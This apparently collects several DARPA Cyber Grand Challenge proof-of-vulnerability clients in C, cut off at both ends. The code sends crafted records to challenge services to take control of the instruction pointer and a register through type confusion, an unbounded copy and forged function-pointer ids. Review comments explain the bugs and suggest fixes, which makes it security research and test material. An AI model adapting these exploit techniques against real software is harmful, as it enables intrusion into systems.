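            "\x20\x00\x00\x00\xc3\x1f\x1f\x1f\xe6\x41\x41\x41\x01\x00\x00\x00"
            "\x07\x00\x00\x00\xc4\x1f\x1f\x1f\xe7\x41\x41\x41\x01\x00\x00\x00"
            "\x1d\x00\x00\x00\xc5\x1f\x1f\x1f\xe8\x41\x41\x41\x00\x00\x00\x00"
            "\x29\x00\x00\x00\xc6\x1f\x1f\x1f\xe9\x41\x41\x41\x01\x00\x00\x00"
            "\x2f\x00\x00\x00\xc7\x1f\x1f\x1f\xea\x41\x41\x41\x01\x00\x00\x00"
            "\x2d\x00\x00\x00\xc8\x1f\x1f\x1f\xeb\x41\x41\x41\x01\x00\x00\x00"
            "\x17\x00\x00\x00\xc9\x1f\x1f\x1f\xec\x41\x41\x41\x00\x00\x00\x00"
            "\x1d\x00\x00\x00\xca\x1f\x1f\x1f\xed\x41\x41\x41\x01\x00\x00\x00"
            "\x23\x00\x00\x00\xcb\x1f\x1f\x1f\xee\x41\x41\x41\x00\x00\x00\x00"
            "\x0e\x00\x00\x00\xcc\x1f\x1f\x1f\xef\x41\x41\x41\x01\x00\x00\x00"
            "\x06\x00\x00\x00\xcd\x1f\x1f\x1f\xf0\x41\x41\x41\x01\x00\x00\x00"
            "\x30\x00\x00\x00\xce\x1f\x1f\x1f\xf1\x41\x41\x41\x01\x00\x00\x00"
            "\x09\x00\x00\x00\xcf\x1f\x1f\x1f\xf2\x41\x41\x41\x00\x00\x00\x00"
            "\x1d\x00\x00\x00\xd0\x1f\x1f\x1f\xf3\x41\x41\x41\x00\x00\x00\x00"
            "\x11\x00\x00\x00\xd1\x1f\x1f\x1f\xf4\x41\x41\x41\x01\x00\x00\x00"
            "\x22\x00\x00\x00\xd2\x1f\x1f\x1f\xf5\x41\x41\x41\x01\x00\x00\x00"
            "\x1a\x00\x00\x00\xd3\x1f\x1f\x1f\xf6\x41\x41\x41\x01\x00\x00\x00"
            "\x08\x00\x00\x00\xd4\x1f\x1f\x1f\xf7\x41\x41\x41\x01\x00\x00\x00"
            "\x27\x00\x00\x00\xd5\x1f\x1f\x1f\xf8\x41\x41\x41\x01\x00\x00\x00"
            "\x13\x00\x00\x00\xd6\x1f\x1f\x1f\xf9\x41\x41\x41\x01\x00\x00\x00"
            "\x1b\x00\x00\x00\xd7\x1f\x1f\x1f\xfa\x41\x41\x41\x00\x00\x00\x00"
            "\x2b\x00\x00\x00\xd8\x1f\x1f\x1f\xfb\x41\x41\x41\x01\x00\x00\x00"
            "\x17\x00\x00\x00\xd9\x1f\x1f\x1f\xfc\x41\x41\x41\x01\x00\x00\x00"
            "\x28\x00\x00\x00\xda\x1f\x1f\x1f\xfd\x41\x41\x41\x01\x00\x00\x00"
            "\x30\x00\x00\x00\xdb\x1f\x1f\x1f\xfe\x41\x41\x41\x00\x00\x00\x00"
            "\x2b\x00\x00\x00\xdc\x1f\x1f\x1f\xff\x41\x41\x41\x00\x00\x00\x00"
            "\x11\x00\x00\x00\xdd\x1f\x1f\x1f\x00\x42\x41\x41\x01\x00\x00\x00"
            "\x22\x00\x00\x00\xde\x1f\x1f\x1f\x01\x42\x41\x41\x01\x00\x00\x00"
            "\x14\x00\x00\x00\xdf\x1f\x1f\x1f\x02\x42\x41\x41\x01\x00\x00\x00"
            "\x23\x00\x00\x00\xe0\x1f\x1f\x1f\x03\x42\x41\x41\x01\x00\x00\x00"
            "\x20\x00\x00\x00\xe1\x1f\x1f\x1f\x04\x42\x41\x41\x01\x00\x00\x00"
            "\x21\x00\x00\x00\xe2\x1f\x1f\x1f\x05\x42\x41\x41\x00\x00\x00\x00"
            "\x0a\x00\x00\x00\xe3\x1f\x1f\x1f\x06\x42\x41\x41\x01\x00\x00\x00"
            "\x0b\x00\x00\x00\xe4\x1f\x1f\x1f\x07\x42\x41\x41\x01\x00\x00\x00"
            "\x0d\x00\x00\x00\xe5\x1f\x1f\x1f\x08\x42\x41\x41\x00\x00\x00\x00"
            "\x27\x00\x00\x00\xe6\x1f\x1f\x1f";
        static unsigned int write_00001_00000_len = 3208;

        /*
         * View the table as 32-bit words so individual fields can be patched.
         * NOTE(review): a static unsigned char array is not guaranteed to be
         * 4-byte aligned; this relies on the x86 target tolerating unaligned
         * access.
         */
        unsigned int *buf = (unsigned int *)write_00001_00000;
        unsigned int buf_idx = 1;               // buf[0] is command bytes
        unsigned int r_count = buf[buf_idx++];  // buf[1] is rider count

        for (unsigned int i = 0; i < r_count; i++) {
            buf[buf_idx] = t1vals.regval++;     // id = regval
            buf[buf_idx + 3] = t1vals.ipval++;  // health_check = ipval
            buf_idx += 4;
        }

        transmit_all(1, write_00001_00000, write_00001_00000_len);

        /*
         * buf aliases the static array above and must not be freed: the
         * original free(buf) passed a pointer that never came from malloc,
         * which is undefined behaviour.
         */
    }

    {
        //**** length cgc_read
        unsigned char read_00001[4];

        (void)length_read(0, read_00001, sizeof(read_00001));
    }

    {
        //*** writing data
        static unsigned char write_00002_00000[] =
            "\x10\x11\x12\x13\x10\x27\x00\x00";
        static unsigned int write_00002_00000_len = 8;
        unsigned char *write_00002 = NULL;
        unsigned int write_00002_len = 0;

        write_00002 = append_buf(write_00002, &write_00002_len,
                                 write_00002_00000, write_00002_00000_len);
        if (write_00002_len > 0) {
            transmit_all(1, write_00002, write_00002_len);
        }
        free(write_00002);
    }

    {
        //**** length cgc_read
        unsigned char read_00002[4];

        (void)length_read(0, read_00002, sizeof(read_00002));
    }

    {
        //*** writing data
        static unsigned char write_00003_00000[] =
            "\x11\x22\x33\x11";
        static unsigned int write_00003_00000_len = 4;
        unsigned char *write_00003 = NULL;
        unsigned int write_00003_len = 0;

        write_00003 = append_buf(write_00003, &write_00003_len,
                                 write_00003_00000, write_00003_00000_len);
        if (write_00003_len > 0) {
            transmit_all(1, write_00003, write_00003_len);
        }
        free(write_00003);
    }

    {
        //**** length cgc_read
        unsigned char read_00003[4];

        (void)length_read(0, read_00003, sizeof(read_00003));
    }

    {
        //*** writing data
        static unsigned char write_00004_00000[] =
            "\x10\x11\x12\x13\x10\x27\x00\x00";
        static unsigned int write_00004_00000_len = 8;
        unsigned char *write_00004 = NULL;
        unsigned int write_00004_len = 0;

        write_00004 = append_buf(write_00004, &write_00004_len,
                                 write_00004_00000, write_00004_00000_len);
        if (write_00004_len > 0) {
            transmit_all(1, write_00004, write_00004_len);
        }
        free(write_00004);
    }

    {
        //**** length cgc_read
        unsigned char read_00004[4];

        (void)length_read(0, read_00004, sizeof(read_00004));
    }

    return 0;
}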
/*
 * CGC type 1 PoV client for a line-oriented text service.
 *
 * Sends a fixed sequence of short text lines. One line in the middle
 * carries the negotiated register and instruction-pointer values, each
 * rendered as the decimal text of a double whose low 32 bits hold the
 * value. Three reply lines are then read and discarded before the final
 * line is sent.
 */
int main(void)
{
    /* A fixed run of bytes to transmit and its length (NUL excluded). */
    struct fixed_write {
        unsigned char *data;
        unsigned int len;
    };

    /* Lines sent before the value-bearing line (ASCII shown at the right). */
    static unsigned char bytes_00[] = "\x73\x0a";             /* "s\n"    */
    static unsigned char bytes_01[] = "\x64\x0a";             /* "d\n"    */
    static unsigned char bytes_02[] = "\x31\x30\x2e\x30\x0a"; /* "10.0\n" */
    static unsigned char bytes_03[] = "\x61\x0a";             /* "a\n"    */
    static unsigned char bytes_04[] = "\x70\x0a";             /* "p\n"    */
    static unsigned char bytes_05[] = "\x64\x0a";             /* "d\n"    */

    /* Separators used inside the value-bearing line. */
    static unsigned char sep_comma[] = "\x2c";                /* ","      */
    static unsigned char sep_tail[] = "\x2c\x30\x0a";         /* ",0\n"   */

    /* Lines sent after the value-bearing line. */
    static unsigned char bytes_07[] = "\x30\x2c\x30\x2c\x30\x0a"; /* "0,0,0\n" */
    static unsigned char bytes_08[] = "\x31\x2c\x31\x2c\x31\x0a"; /* "1,1,1\n" */
    static unsigned char bytes_09[] = "\x30\x2c\x30\x2c\x30\x0a"; /* "0,0,0\n" */
    static unsigned char bytes_10[] = "\x72\x0a";                 /* "r\n"     */

    /* Last line, sent after the replies have been drained. */
    static unsigned char bytes_11[] = "\x71\x0a";             /* "q\n"    */

    /* Delimiter for the reply reads. */
    static unsigned char newline[] = "\x0a";

    struct fixed_write before[] = {
        { bytes_00, 2 }, { bytes_01, 2 }, { bytes_02, 5 },
        { bytes_03, 2 }, { bytes_04, 2 }, { bytes_05, 2 },
    };
    struct fixed_write after[] = {
        { bytes_07, 6 }, { bytes_08, 6 }, { bytes_09, 6 }, { bytes_10, 2 },
    };

    type1_vals vals;

    type1_negotiate(0x00fffff, 0x00fffff, 1, &vals);

    //*** delay
    delay(100);

    /* Fixed lines preceding the value-bearing line. */
    for (unsigned int k = 0; k < sizeof(before) / sizeof(before[0]); k++) {
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len,
                                        before[k].data, before[k].len);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    /* Value-bearing line: "<regval as double>,<ipval as double>,0\n". */
    {
        unsigned char *out = NULL;
        unsigned int out_len = 0;
        char dtostr_buf[256];
        /* Overlay used to place a 32-bit value in the low half of a double. */
        union {
            double d;
            struct {
                unsigned int lo, hi;
            } u;
        } pack;

        pack.u.hi = 0x41800000;

        pack.u.lo = vals.regval;
        dtostr(pack.d, dtostr_buf, sizeof(dtostr_buf));
        out = append_buf(out, &out_len,
                         (unsigned char *)dtostr_buf, cgc_strlen(dtostr_buf));
        out = append_buf(out, &out_len, sep_comma, 1);

        pack.u.lo = vals.ipval;
        dtostr(pack.d, dtostr_buf, sizeof(dtostr_buf));
        out = append_buf(out, &out_len,
                         (unsigned char *)dtostr_buf, cgc_strlen(dtostr_buf));
        out = append_buf(out, &out_len, sep_tail, 3);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    /* Fixed lines following the value-bearing line. */
    for (unsigned int k = 0; k < sizeof(after) / sizeof(after[0]); k++) {
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len,
                                        after[k].data, after[k].len);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    /* Read and discard three newline-delimited replies. */
    for (unsigned int k = 0; k < 3; k++) {
        unsigned char *line = NULL;
        unsigned int line_len = 0;
        int rc = delimited_read(0, &line, &line_len, newline, 1);

        (void)rc; /* result deliberately ignored, as in the generated code */
        free(line);
    }

    delay(100);

    /* Final line. */
    {
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes_11, 2);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }
}
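/*
 * Type 1 proof-of-vulnerability client for the order service (customers,
 * tables, appetizer / meal / dessert orders).
 *
 * Flow, as driven below:
 *   1. type1_negotiate() supplies the register value (register number 2) and
 *      the instruction-pointer value this run has to demonstrate.
 *   2. add_customer: CUSTOMER_COUNT customer ids are sent, starting at the
 *      negotiated register value and counting up by one.
 *   3. Three get_orders / order_up rounds (appetizers, meals, desserts): the
 *      orders the service hands out are stored locally and echoed back.
 *   4. In the dessert round, orders for TARGET_TABLE_ID are echoed back
 *      labelled MEAL_TYPE with an 80-byte body (24 + 4 + 52) instead of a
 *      DES_NAME_SZ-byte dessert name; the 4 bytes in the middle carry the
 *      negotiated ip value.
 *
 * NOTE(review): the service side is not visible here. Presumably it picks the
 * record size from the ftype echoed by the client instead of the type it
 * recorded for that order -- confirm against the service source. If so, the
 * service-side fix is to reject an order_up whose ftype differs from the
 * stored one before reading the body.
 *
 * Returns 0 after a completed exchange, -1 if a local allocation fails.
 */
int main(void)
{
    unsigned int reg, ip;
    type1_vals t1vals;

    /* Both masks leave the low 7 bits out of the negotiation; presumably so
     * the reg++ / ip++ below cannot disturb negotiated bits -- TODO confirm. */
    type1_negotiate(0x0fffff80, 0xffffff80, 2, &t1vals);

    reg = t1vals.regval; // c_id
    ip = t1vals.ipval|0xf0000000; // make sure it's in kernel space
                                  // bytes 25-28 in a MEAL

    unsigned char ok_buf[2] = {0};
    unsigned char seated = 0;
    unsigned char c_count = CUSTOMER_COUNT;

    /* add_customer
     *   send add_customer cmd
     *   send CUSTOMER_COUNT
     *   generate and send CUSTOMER_COUNT customer ids (c_ids)
     *   recv # of seated customers
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_ADD_CUST);
    SEND_UCHAR(&c_count);
    for (int i = 0; i < CUSTOMER_COUNT; i++) {
        SEND_UINT(&reg);
        reg++;
    }
    RECV_UCHAR(&seated);
    RECV_OK(ok_buf);

    Order *o_list = NULL;
    Order *o = NULL;
    unsigned char o_count = 0;
    unsigned int ids[2] = {0};
    Appetizer *app = NULL;
    Meal *meal = NULL;
    Dessert *des = NULL;

    /* app get_orders
     *   send get_orders cmd
     *   recv # of orders
     *   recv orders
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_GET_ORDERS);
    RECV_UCHAR(&o_count);
    for (unsigned int i = 0; i < o_count; i++) {
        o = malloc(sizeof(Order));
        if (!o) return -1;
        RECV_IDS(ids);
        o->t_id = ids[0];
        o->c_id = ids[1];

        app = malloc(sizeof(Appetizer));
        if (!app) return -1;
        /* The trailing pointer-sized member is not part of the wire record. */
        RECV_FOOD(app, sizeof(Appetizer) - sizeof(void *));
        o->item = app;
        o->ftype = app->ftype;
        append_order_to_list(&o_list, o);
    }
    RECV_OK(ok_buf);

    /* app order_up
     *   send order_up cmd
     *   send # of orders
     *   send orders
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_ORDER_UP);
    SEND_UCHAR(&o_count);
    o = pop_order_from_list(&o_list);
    while (o) {
        ids[0] = o->t_id;
        ids[1] = o->c_id;
        SEND_IDS(ids);
        SEND_UINT(&o->ftype);
        app = o->item;
        SEND_FOOD(app->name, APP_NAME_SZ);
        free(o->item);
        free(o);
        o = pop_order_from_list(&o_list);
    }
    RECV_OK(ok_buf);

    /* meal get_orders
     *   send get_orders cmd
     *   recv # of orders
     *   recv orders
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_GET_ORDERS);
    RECV_UCHAR(&o_count);
    for (unsigned int i = 0; i < o_count; i++) {
        o = malloc(sizeof(Order));
        if (!o) return -1;
        RECV_IDS(ids);
        o->t_id = ids[0];
        o->c_id = ids[1];

        meal = malloc(sizeof(Meal));
        if (!meal) return -1;
        RECV_FOOD(meal, sizeof(Meal) - sizeof(void *));
        o->item = meal;
        o->ftype = meal->ftype;
        append_order_to_list(&o_list, o);
    }
    RECV_OK(ok_buf);

    /* meal order_up
     *   send order_up cmd
     *   send # of orders
     *   send orders
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_ORDER_UP);
    SEND_UCHAR(&o_count);
    o = pop_order_from_list(&o_list);
    while (o) {
        ids[0] = o->t_id;
        ids[1] = o->c_id;
        SEND_IDS(ids);
        SEND_UINT(&o->ftype);
        meal = o->item;
        SEND_FOOD(meal->name, MEAL_NAME_SZ + MEAL_MAIN_SZ + MEAL_VEG_SZ + MEAL_SIDE_SZ);
        free(o->item);
        free(o);
        o = pop_order_from_list(&o_list);
    }
    RECV_OK(ok_buf);

    /* des get_orders
     *   send get_orders cmd
     *   recv # of orders
     *   recv orders
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_GET_ORDERS);
    RECV_UCHAR(&o_count);
    for (unsigned int i = 0; i < o_count; i++) {
        o = malloc(sizeof(Order));
        if (!o) return -1;
        RECV_IDS(ids);
        o->t_id = ids[0];
        o->c_id = ids[1];

        des = malloc(sizeof(Dessert));
        if (!des) return -1;
        RECV_FOOD(des, sizeof(Dessert) - sizeof(void *));
        o->item = des;
        o->ftype = des->ftype;
        append_order_to_list(&o_list, o);
    }
    RECV_OK(ok_buf);

    /* des order_up
     *   send order_up cmd
     *   send # of orders
     *   send orders (MOD orders for TARGET_TABLE_ID to be MEALs)
     *     send 24 bytes
     *     send 4 byte ip
     *     send 52 bytes
     *   recv STATUS_OK
     */
    SEND_CMD(CMD_ORDER_UP);
    SEND_UCHAR(&o_count);
    o = pop_order_from_list(&o_list);
    while (o) {
        ids[0] = o->t_id;
        ids[1] = o->c_id;
        SEND_IDS(ids);
        if (TARGET_TABLE_ID == o->t_id) { // POV
            /* The order was received as a dessert; only the echoed type and
             * body length differ from what the service handed out. */
            o->ftype = MEAL_TYPE;
            SEND_UINT(&o->ftype);
            meal = o->item;
            SEND_FOOD(&FOOD[TARGET_TABLE_ID], 24);
            SEND_UINT(&ip);
            ip++;
            SEND_FOOD(&FOOD[TARGET_TABLE_ID], 52);
        } else { // not POV
            SEND_UINT(&o->ftype);
            des = o->item;
            SEND_FOOD(des->name, DES_NAME_SZ);
        }
        free(o->item);
        free(o);
        o = pop_order_from_list(&o_list);
    }
    RECV_OK(ok_buf);

    /* quit */
    SEND_CMD(CMD_QUIT);
    RECV_OK(ok_buf);

    return 0;
}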
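/* Send len bytes on fd 1 through the same append_buf / transmit_all path the
 * generated code used for every write. */
static void pov_send(unsigned char *data, unsigned int len)
{
    unsigned char *out = NULL;
    unsigned int out_len = 0;

    out = append_buf(out, &out_len, data, len);
    if (out_len > 0) {
        transmit_all(1, out, out_len);
    }
    free(out);
}

/* Read len bytes from fd 0 and discard them. When expect is non-NULL the
 * bytes are first passed to data_match() against expect; as in the generated
 * code, neither the read result nor the match result is acted on.
 * Returns 0, or -1 if the receive buffer cannot be allocated. */
static int pov_recv(unsigned int len, unsigned char *expect, unsigned int expect_len)
{
    unsigned int matched = 0;
    unsigned char *in = malloc(len);

    if (in == NULL) {
        return -1; /* never hand a NULL buffer to length_read() */
    }
    (void)length_read(0, in, len);
    if (expect != NULL) {
        matched += data_match(in, len, expect, expect_len);
    }
    (void)matched;
    free(in);
    return 0;
}

/*
 * Type 1 proof-of-vulnerability replay: a recorded session with two 4-byte
 * slots replaced by the values obtained from type1_negotiate().
 *
 * The negotiated instruction-pointer and register (number 6, ESI) values are
 * sent right after the 144-byte record and are followed by a single 0xed
 * byte. Both masks are built from 0xed bytes and no_ed sets the complementary
 * 0x12 bits in every byte, so no byte of either value can equal 0xed.
 *
 * NOTE(review): the service is not visible here. The original comments place
 * the two values at "&desc_copy" and "&p", which suggests the bytes before
 * the 0xed marker are copied without being bounded by the destination size --
 * confirm against the service source; the fix would be a length check there.
 *
 * Returns 0 after the replay, -1 if a receive buffer cannot be allocated.
 */
int main(void)
{
    type1_vals t1vals;
    type1_negotiate(0xedededed, 0xededede5, 6, &t1vals); // ESI == 6, last byte is going to be off by 8

    unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG

    static unsigned char hdr_a[] = "\x04\xd4\x7e\x00";
    static unsigned char hdr_b[] = "\xc4\xec\x4e\xee";
    /* Sent unchanged after each of the two headers. */
    static unsigned char key[] = "\x31\x33\x30\x30\x31\x33\x38\x38";
    static unsigned char record[] =
        "\x0f\x44\x00\x00\xcd\xcc\x3c\x40\x75\x4d\x68\x49\x65\x4e\x46\x51"
        "\x5a\x4b\x69\x7a\x62\x57\x6d\x41\x66\x53\x48\x70\x52\x62\x49\x56"
        "\x57\x4e\x56\x43\x66\x70\x51\x5a\x4c\x78\x6b\x7a\x4f\x7a\x61\x65"
        "\x77\x64\x56\x56\x54\x78\x43\x56\x6f\x62\x42\x51\x50\x66\x47\x76"
        "\x75\x64\x45\x51\x74\x4b\x6c\x72\x50\x67\x79\x59\x64\x56\x52\x4d"
        "\x6c\x50\x55\x57\x58\x41\x57\x4a\x62\x42\x69\x47\x41\x52\x55\x59"
        "\x77\x77\x59\x54\x58\x44\x43\x55\x42\x7a\x47\x76\x63\x6b\x6f\x52"
        "\x70\x5a\x69\x6b\x6b\x79\x71\x77\x6b\x67\x61\x66\x58\x6d\x61\x50"
        "\x56\x74\x52\x47\x45\x54\x62\x63\x41\x42\x43\x44\x45\x46\x47\x48";
    static unsigned char marker[] = "\xed";
    static unsigned char tail[] = "\xff\xff\xff\xff";
    /* Bytes the recorded session saw echoed back (145 including the marker). */
    static unsigned char expected_echo[] =
        "\x75\x4d\x68\x49\x65\x4e\x46\x51\x5a\x4b\x69\x7a\x62\x57\x6d\x41"
        "\x66\x53\x48\x70\x52\x62\x49\x56\x57\x4e\x56\x43\x66\x70\x51\x5a"
        "\x4c\x78\x6b\x7a\x4f\x7a\x61\x65\x77\x64\x56\x56\x54\x78\x43\x56"
        "\x6f\x62\x42\x51\x50\x66\x47\x76\x75\x64\x45\x51\x74\x4b\x6c\x72"
        "\x50\x67\x79\x59\x64\x56\x52\x4d\x6c\x50\x55\x57\x58\x41\x57\x4a"
        "\x62\x42\x69\x47\x41\x52\x55\x59\x77\x77\x59\x54\x58\x44\x43\x55"
        "\x42\x7a\x47\x76\x63\x6b\x6f\x52\x70\x5a\x69\x6b\x6b\x79\x71\x77"
        "\x6b\x67\x61\x66\x58\x6d\x61\x50\x56\x74\x52\x47\x45\x54\x62\x63"
        "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
        "\xed";

    /* sizeof - 1 everywhere: the literal's NUL terminator is not sent. */
    pov_send(hdr_a, sizeof hdr_a - 1);   /* 4 bytes */
    pov_send(key, sizeof key - 1);       /* 8 bytes */
    pov_send(record, sizeof record - 1); /* 144 bytes */

    // # &desc_copy (EIP) -> JKLM
    unsigned int eip = t1vals.ipval | no_ed;
    pov_send((unsigned char *)&eip, 4);

    // # &p (ESI) -> (N+8)OPQ
    unsigned int reg = t1vals.regval | no_ed;
    pov_send((unsigned char *)&reg, 4);

    pov_send(marker, sizeof marker - 1); /* 1 byte */
    if (pov_recv(2, NULL, 0) != 0) return -1;

    pov_send(hdr_b, sizeof hdr_b - 1);   /* 4 bytes */
    pov_send(key, sizeof key - 1);       /* 8 bytes */
    if (pov_recv(4, NULL, 0) != 0) return -1;
    if (pov_recv(4, NULL, 0) != 0) return -1;
    if (pov_recv(145, expected_echo, sizeof expected_echo - 1) != 0) return -1;
    if (pov_recv(2, NULL, 0) != 0) return -1;

    pov_send(tail, sizeof tail - 1);     /* 4 bytes */
    if (pov_recv(2, NULL, 0) != 0) return -1;

    return 0;
}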
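/* Store val at 32-bit word index `word` of msg, byte by byte in host order.
 * Produces the same bytes as writing through an unsigned int pointer, without
 * the aliasing and alignment assumptions that cast would need. */
static void patch_word(unsigned char *msg, unsigned int word, unsigned int val)
{
    const unsigned char *src = (const unsigned char *)&val;

    for (unsigned int i = 0; i < sizeof val; i++) {
        msg[word * sizeof val + i] = src[i];
    }
}

/* Send one record on fd 1, then read and discard the 4-byte reply from fd 0.
 * The read result is ignored, as in the generated code.
 * Returns 0, or -1 if the reply buffer cannot be allocated. */
static int exchange(unsigned char *msg, unsigned int len)
{
    enum { REPLY_LEN = 4 };
    unsigned char *out = NULL;
    unsigned int out_len = 0;
    unsigned char *reply;

    out = append_buf(out, &out_len, msg, len);
    if (out_len > 0) {
        transmit_all(1, out, out_len);
    }
    free(out);

    reply = malloc(REPLY_LEN);
    if (reply == NULL) {
        return -1; /* never hand a NULL buffer to length_read() */
    }
    (void)length_read(0, reply, REPLY_LEN);
    free(reply);
    return 0;
}

/*
 * Type 1 proof-of-vulnerability replay: twelve 44-byte records followed by
 * six shorter relationship records, each answered by a 4-byte reply.
 *
 * The id of the record labelled parent2 is replaced by the negotiated
 * register value (register number 2) and the id of parent3 by the negotiated
 * instruction-pointer value, in the records themselves and in every
 * relationship record that refers to them. Both values get their top nibble
 * forced to 0xF.
 *
 * Each record appears to be a 4-byte tag, a 4-byte length (0x24, 0x08 or
 * 0x0c) and a payload whose first word is the id -- TODO confirm against the
 * service's message format.
 *
 * NOTE(review): which service operation misuses the ids is not visible here;
 * the original comment only says the values are pushed out of the range of
 * valid function pointers. Confirm against the service source.
 *
 * Returns 0 after the replay, -1 if a reply buffer cannot be allocated.
 */
int main(void)
{
    type1_vals t1vals = { 0 };
    uint32_t mask_eip, mask_reg;

    mask_eip = 0x0FFFFFFF;
    mask_reg = 0x0FFFFFFF;
    type1_negotiate(mask_eip, mask_reg, 2, &t1vals);

    t1vals.ipval |= 0xF0000000; // make sure out of range of valid fn ptrs
    t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs

    // parent2 regval
    // parent3 ipval
    unsigned int p2_val = t1vals.regval;
    unsigned int p3_val = t1vals.ipval;

    /* 44-byte records, in the order they are sent. */
    static unsigned char rec_child[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x1f\xbc\x00\x00\x00\x4d\x66\x59"
        "\x55\x54\x78\x58\x53\x6e\x49\x53\x70\x54\x58\x43\x75\x65\x79\x6a"
        "\x7a\x50\x47\x63\x52\x59\x6c\x6e\x61\x70\x63\x76";
    static unsigned char rec_01[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x2e\xa5\x00\x00\x34\x1f\x4c\x57"
        "\x68\x6e\x42\x69\x58\x73\x51\x66\x4e\x4c\x74\x65\x44\x42\x54\x67"
        "\x76\x57\x4b\x74\x75\x46\x44\x49\x4c\x57\x4b\x73";
    static unsigned char rec_parent1[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xd8\xc0\x00\x00\x75\x6a\x6d\x53"
        "\x4d\x68\x53\x69\x58\x71\x61\x63\x55\x5a\x6b\x44\x4d\x43\x65\x41"
        "\x50\x4f\x5a\x75\x4b\x56\x4a\x63\x77\x48\x6d\x47";
    static unsigned char rec_03[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x29\x66\x00\x00\x99\x7a\x73\x75"
        "\x75\x65\x6e\x49\x51\x4d\x6a\x73\x47\x48\x57\x76\x4f\x4c\x43\x64"
        "\x72\x42\x41\x4d\x6b\x6e\x7a\x75\x6c\x4f\x52\x5a";
    static unsigned char rec_04[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x73\xd3\x00\x00\x90\x1d\x54\x68"
        "\x44\x4d\x70\x55\x4b\x74\x4c\x43\x72\x4e\x76\x4e\x79\x4f\x7a\x72"
        "\x4b\x64\x49\x65\x59\x55\x61\x46\x4c\x50\x52\x45";
    static unsigned char rec_parent2[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6c\x13\x00\x00\xc6\x5d\x50\x51"
        "\x66\x47\x50\x57\x79\x78\x6e\x54\x75\x77\x5a\x64\x4f\x66\x70\x72"
        "\x48\x67\x70\x72\x79\x6b\x75\x50\x6c\x63\x6b\x50";
    static unsigned char rec_06[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x6e\xc5\x00\x00\x72\xc5\x42\x6d"
        "\x4e\x49\x6e\x54\x51\x6c\x75\x44\x5a\x6c\x57\x43\x71\x6f\x4a\x6f"
        "\x61\x4c\x49\x51\x66\x4d\x75\x47\x6b\x43\x55\x63";
    static unsigned char rec_07[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x3e\xc0\x00\x00\x51\xb2\x70\x79"
        "\x44\x59\x77\x67\x67\x57\x48\x65\x53\x4f\x76\x55\x77\x61\x65\x75"
        "\x68\x6b\x71\x71\x61\x52\x4b\x48\x55\x63\x6d\x52";
    static unsigned char rec_parent3[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x82\x24\x00\x00\xa9\x7c\x70\x41"
        "\x4e\x45\x62\x78\x44\x6b\x64\x4d\x46\x47\x76\x6f\x51\x4a\x51\x68"
        "\x76\x4d\x6d\x5a\x57\x5a\x73\x6e\x77\x57\x71\x61";
    static unsigned char rec_09[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xa8\x13\x00\x00\x4b\x68\x62\x6c"
        "\x53\x6f\x79\x46\x64\x76\x5a\x44\x73\x42\x56\x6d\x4d\x6b\x7a\x42"
        "\x66\x69\x44\x73\x74\x6b\x61\x6e\x71\x68\x66\x41";
    static unsigned char rec_10[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\xe1\x79\x01\x00\x74\xf8\x4c\x59"
        "\x73\x5a\x64\x42\x4d\x48\x44\x45\x6a\x56\x76\x4d\x79\x6f\x49\x4d"
        "\x79\x63\x41\x50\x45\x69\x75\x4c\x78\x6d\x73\x4b";
    static unsigned char rec_11[] =
        "\xa0\xa1\xa2\xa3\x24\x00\x00\x00\x71\xe1\x00\x00\x05\x0e\x69\x77"
        "\x6f\x65\x69\x64\x53\x6b\x68\x4f\x51\x69\x75\x66\x57\x54\x54\x4b"
        "\x41\x67\x53\x71\x43\x41\x79\x48\x7a\x72\x73\x68";

    /* Relationship records (16 or 20 bytes). */
    static unsigned char union_p1_p2[] =
        "\xf0\xf1\xf2\xf3\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00";
    static unsigned char adopt_p1_p2[] =
        "\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\xd8\xc0\x00\x00"
        "\x6c\x13\x00\x00";
    static unsigned char sep_p1_p2[] =
        "\x50\x11\x50\x11\x08\x00\x00\x00\xd8\xc0\x00\x00\x6c\x13\x00\x00";
    static unsigned char union_p2_p3[] =
        "\xf0\xf1\xf2\xf3\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00";
    static unsigned char sep_p2_p3[] =
        "\x50\x11\x50\x11\x08\x00\x00\x00\x6c\x13\x00\x00\x82\x24\x00\x00";
    static unsigned char adopt_unk_p2[] =
        "\xac\xac\xac\xac\x0c\x00\x00\x00\x1f\xbc\x00\x00\x00\x00\x00\x00"
        "\x6c\x13\x00\x00";

    /* sizeof - 1 everywhere: the literal's NUL terminator is not sent. */

    // writing data (child)
    if (exchange(rec_child, sizeof rec_child - 1) != 0) return -1;
    if (exchange(rec_01, sizeof rec_01 - 1) != 0) return -1;

    // writing data (parent1)
    if (exchange(rec_parent1, sizeof rec_parent1 - 1) != 0) return -1;
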